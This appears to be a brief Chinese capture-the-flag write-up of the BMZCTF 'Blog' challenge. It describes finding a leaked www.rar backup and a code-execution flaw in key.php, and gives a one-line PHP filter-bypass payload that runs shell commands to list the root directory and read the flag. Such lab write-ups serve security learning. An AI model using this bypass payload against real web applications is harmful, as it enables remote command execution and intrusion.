BMZCTF：Blog

http://www.bmzclub.cn/challenges#Blog

目录扫描扫到一个www.rar，查看源码发现./www/key/key.php存在代码执行

很简单的绕过，直接参考我的这篇文章：浅谈PHP代码执行中出现过滤限制的绕过执行方法

/key/key.php?c=(sys.tem)("ls -lha /;cat /fla*");

标签：www,BMZCTF,Blog,代码执行,key,绕过,php
来源： https://blog.csdn.net/mochu7777777/article/details/116161267